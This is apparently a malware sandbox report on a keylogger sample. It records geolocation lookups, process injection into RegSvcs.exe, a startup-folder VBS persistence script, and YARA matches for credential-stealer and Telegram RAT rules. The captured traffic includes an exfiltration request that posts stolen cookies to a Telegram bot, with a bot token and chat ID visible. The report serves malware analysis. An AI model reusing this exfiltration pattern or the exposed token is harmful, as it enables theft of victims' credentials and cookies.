    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1821584&cwnd=229&unsent_bytes=0&cid=2c38c2bcdb4931c7&ts=156&x=0"
2025-01-11 00:28:01 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 15 | Source IP: 192.168.2.5 | Source Port: 55451 | Destination IP: 104.21.80.1 | Destination Port: 443 | PID: 6148 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:28:03 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-11 00:28:03 UTC | 859 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 00:28:03 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1870072
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ISoEpihuglkg7z2t6Z8Y%2F9m9CcX%2BBkQBsqnvF%2BgGROBCdyYnzYs9%2BUtu3PLJZB2Y4torlcegJyfDkpOoUH3zWiNm%2FxeO3Z8hiBi2ifABpDKqh8pomhTP8xV2ry3vti4Apu911Orb"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9000c8d7a84fc443-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1647&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1742243&cwnd=244&unsent_bytes=0&cid=ff55f91d1fea5921&ts=154&x=0"
2025-01-11 00:28:03 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   16 | 192.168.2.5 | 55463 | 104.21.80.1 | 443 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   2025-01-11 00:28:04 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                   2025-01-11 00:28:04 UTC | 866 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:04 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870073
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFc4e0V50goW0f4QbGWUjSw4p244M44qQ6J6l4noMK5M%2BIMLfV5TcTB0%2BGszJWPAi%2BMV0h%2FUhYNEewY68tkP35O%2FI8rodknwZOvvc0pPLTkoNrglHVt%2BpAQHTdrxXnGDQ%2FJTsfhA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8e04fc38c0f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=37297&min_rtt=1993&rtt_var=21769&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1465127&cwnd=223&unsent_bytes=0&cid=c561a148e34cc432&ts=165&x=0"
                                                                                                                  2025-01-11 00:28:04 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   17 | 192.168.2.5 | 55474 | 104.21.80.1 | 443 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   2025-01-11 00:28:05 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                   2025-01-11 00:28:05 UTC | 854 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:05 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870074
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qp5b3G6qDVO2lmOwcMymKfNMYd3RQEXR7Hf0qoPkECyO5GsB3SWGCcY5jQyENMbUmrmpKpfRtfAokaygj5XRslq2G2Ev8dMlyVOASyeI%2Bx0Y8zjtPvIPogsDttumRt%2B98WAoKeCW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8e86e1b43ee-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=9916&min_rtt=2215&rtt_var=5611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1318284&cwnd=228&unsent_bytes=0&cid=d0b8f392207e9639&ts=171&x=0"
                                                                                                                  2025-01-11 00:28:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   18 | 192.168.2.5 | 55482 | 104.21.80.1 | 443 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   2025-01-11 00:28:07 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                   2025-01-11 00:28:07 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:07 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870076
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WwQt%2Bo4DccRs0O6GhbxptQvwPeJsTgdBdrfna%2BPV8S2PeLgScjyHvq56g58ECQjjfNK2QAlweXU2oi2tiEI3ZmaA99CLiVuDnABhUsV7dANOl1%2BbI1BFyUD969Frhq%2FRUhO%2FL6NO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8f03df0c443-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1679&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1706604&cwnd=244&unsent_bytes=0&cid=0942defcd6e17cc7&ts=128&x=0"
                                                                                                                  2025-01-11 00:28:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   19 | 192.168.2.5 | 55494 | 104.21.80.1 | 443 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   2025-01-11 00:28:08 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                   2025-01-11 00:28:08 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:08 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870077
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=12HunuiWOoo9Ez5ZrSmB5f2epLBP7OdMpqSftQibZ%2FWHC4%2FdSjGFthWJ7%2BmoX0iwMl1KmlP%2BwTmvPeFmN4CG4CdReEaJAU%2FNMxF3qfay2fkVYwcnyNg3y%2BuxnlHY4WHNCl0LB3C3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c8f81cea42d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1537&rtt_var=590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1833019&cwnd=229&unsent_bytes=0&cid=bab59587099f5f05&ts=152&x=0"
                                                                                                                  2025-01-11 00:28:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   20 | 192.168.2.5 | 55499 | 149.154.167.220 | 443 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   2025-01-11 00:28:09 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:42:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                   2025-01-11 00:28:09 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:09 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-11 00:28:09 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   21 | 192.168.2.5 | 55539 | 149.154.167.220 | 443 | 6148 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   2025-01-11 00:28:15 UTC | 352 | OUT | POST /bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary=------------------------8dd326de7d68210
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 1279
                                                                                                                  2025-01-11 00:28:15 UTC1279OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 36 64 65 37 64 36 38 32 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 37 36 34 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20
                                                                                                                  Data Ascii: --------------------------8dd326de7d68210Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:376483Date and Time: 10/01/2025
                                                                                                                   2025-01-11 00:28:15 UTC | 346 | IN | HTTP/1.1 400 Bad Request
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:15 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 56
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-11 00:28:15 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}



                                                                                                                  Target ID:0
                                                                                                                  Start time:19:27:32
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\6BRa130JDj.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\6BRa130JDj.exe"
                                                                                                                  Imagebase:0x2b0000
                                                                                                                  File size:1'055'744 bytes
                                                                                                                  MD5 hash:CB47B81059D6E0B15AD2AB00C3491C48
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

Target ID: 2
Start time: 19:27:36
Start date: 10/01/2025
Path: C:\Users\user\AppData\Local\Allene\ectosphere.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\6BRa130JDj.exe"
Imagebase: 0x20000
File size: 1'055'744 bytes
MD5 hash: CB47B81059D6E0B15AD2AB00C3491C48
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 75%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 19:27:39
Start date: 10/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\6BRa130JDj.exe"
Imagebase: 0x9a0000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4526688861.0000000000423000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4526688861.000000000043A000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4529175077.0000000002D6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 5
Start time: 19:27:50
Start date: 10/01/2025
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs"
Imagebase: 0x7ff6f0470000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 19:27:51
Start date: 10/01/2025
Path: C:\Users\user\AppData\Local\Allene\ectosphere.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Allene\ectosphere.exe"
Imagebase: 0x20000
File size: 1'055'744 bytes
MD5 hash: CB47B81059D6E0B15AD2AB00C3491C48
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
